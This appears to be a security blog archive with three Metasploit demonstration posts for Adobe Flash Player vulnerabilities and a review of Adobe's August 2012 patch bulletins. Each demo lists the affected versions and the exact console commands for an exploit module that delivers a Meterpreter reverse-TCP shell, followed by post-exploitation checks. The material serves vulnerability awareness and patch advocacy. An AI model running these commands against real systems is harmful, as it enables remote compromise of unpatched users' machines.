Tag Archives: Adobe

CVE-2012-1535 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild and reported by Alexander Gavrun
Vulnerability reported by the vendor the 2012-08-14
Metasploit PoC provided the 2012-08-17

PoC provided by :

Alexander Gavrun
juan vazquez
sinn3r

Reference(s) :

APSB12-18
CVE-2012-1535
OSVDB-84607
BID-55009

Affected version(s) :

Adobe Flash Player 11.3.300.270 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.236 and earlier versions for Linux
Flash Player installed with Google Chrome earlier version 21.0.1180.79.

Tested on Windows 7 Integral with :

Internet Explorer 9
Adobe Flash Player 11.3.300.268

Description :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.

Commands :

use exploit/windows/browser/adobe_flash_otf_font
set SRVHOST 192.168.178.100
set ROP JRE
set TARGET 6
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Adobe August 2012 Patch Tuesday Review

Adobe has release, the 14 August 2012, during his August Patch Tuesday, three security bulletins dealing with 26 vulnerabilities. All these security bulletins have a Critical severity rating and 23 of 26 vulnerabilities have a CVSS base score of 10.0.

APSB12-16 – Security update for Adobe Reader and Acrobat

APSB12-16 is concerning Adobe Reader and Acrobat X (10.1.3) and earlier versions for Windows and Macintosh. 20 vulnerabilities have been fixed in these updates, all of them are classified as Critical and allow code execution. 18 of the 20 vulnerabilities have a CVSS base score of 10.0.

CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159 and CVE-2012-4160 have been discovered and privately reported by Mateusz Jurczyk and Gynvael Coldwind, of the Google Security Team. All these vulnerabilities have a CVSS base score of 10.0.

CVE-2012-4147 (CVSS base score of 10.0), CVE-2012-4161 (CVSS base score of 7.5) and CVE-2012-4162 (CVSS base score f 7.5) have been discovered and privately reported by James Quirk.

CVE-2012-2051, with a CVSS base score of 10.0, has been discovered and privately reported by Mateusz Jurczyk of the Google Security Team.

CVE-2012-2049, with a CVSS base score of 10.0, has been discovered and privately reported by Pavel Polischouk of the Vulnerability Research team at TELUS Security Labs.

CVE-2012-2050, with a CVSS base score of 10.0, has been discovered and privately reported by an anonymous contributor working with Beyond Security’s SecuriTeam Secure Disclosure Program.

CVE-2012-4148, with a CVSS score of 10.0, has been discovered and privately reported by John Leitch at Microsoft and Microsoft Vulnerability Research (MSVR).

CVE-2012-1525, with a CVSS score of 10.0, has been discovered and privately reported by Nicolas Grégoire through iDefense’s Vulnerability Contributor Program.

Despite the high number of fixed vulnerabilities, Adobe Reader for Linux has not been updated and they are still known vulnerabilities in the Windows and Macintosh versions. Adobe plan to release an out-of-band update for Adobe Reader for Linux before 27 August.

APSB12-17- Security update for Adobe Shockwave Player

APSB12-17 is concerning Adobe Shockwave Player 11.6.5.635 and earlier versions on the Windows and Macintosh. 5 vulnerabilities have been fixed in these updates, all of them are classified as Critical and allow code execution. All these vulnerabilities have a CVSS base score of 10.0.

CVE-2012-2043, CVE-2012-2046 and CVE-2012-2047 have been discovered and privately reported by Honggang Ren of Fortinet’s FortiGuard Labs. All these vulnerabilities have a CVSS base score of 10.0.

CVE-2012-2045, with a CVSS base score of 10.0, has been discovered and privately reported by Will Dormann of CERT.

CVE-2012-2044, with a CVSS base score of 10.0, has been discovered and privately reported by suto.

APSB12-18 – Security update for Adobe Flash Player

APSB12-18 is concerning Adobe Flash Player 11.3.300.270 and earlier versions for Windows, Macintosh and Linux.

CVE-2012-1535, with a CVSS base score of 9.3, has been discovered exploited in the wild in limited targeted attacks, distributed through a malicious Word document. The exploit targets the ActiveX version of Flash Player for Internet Explorer on Windows. But since the 18 August a Metasploit module is available and doesn’t require to forge a malicious Word document. The Metasploit module is actually focusing on Windows XP SP3 and is still quiet unstable, but you should urgently update your Flash Player.

CVE-2011-2110 / APSB11-18 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered exploited in the wild
Public release of the vulnerability by the vendor the 2011-06-14
Details of the vulnerability provided the 2011-10-09
Metasploit PoC provided the 2012-06-19

PoC provided by :

mr_me
Unknown

Reference(s) :

CVE-2011-2110
OSVDB-73007
APSB11-18
BID-48268

Affected version(s) :

Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 10.3.185.23 and earlier versions for Android

Tested on Windows XP Pro SP3 with :

Internet Explorer 8
Adobe Flash Player 10.3.181.23

Description :

This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same vulnerability that was used for attacks against Korean based organizations. Specifically, this issue occurs when indexing an array using an arbitrary value, memory can be referenced and later executed. Taking advantage of this issue does not rely on heap spraying as the vulnerability can also be used for information leakage. Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and is very reliable.

Commands :

use exploit/windows/browser/adobe_flashplayer_arrayindexing
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0779 / APSB12-09 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered exploited in the wild
Public release of the vulnerability by the vendor the 2012-05-04
Details of the vulnerability provided the 2012-05-06
Metasploit PoC provided the 2012-06-22

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

CVE-2012-0779
OSVDB-81656
APSB12-09
BID-53395

Affected version(s) :

Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux operating systems
Adobe Flash Player 11.1.115.7 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Internet Explorer 6
Adobe Flash Player 11.2.202.228

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 “_error” response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “World Uyghur Congress Invitation.doc” e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.

Commands :

use exploit/windows/browser/adobe_flash_rtmp
set RTMPHOST 192.168.178.100
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid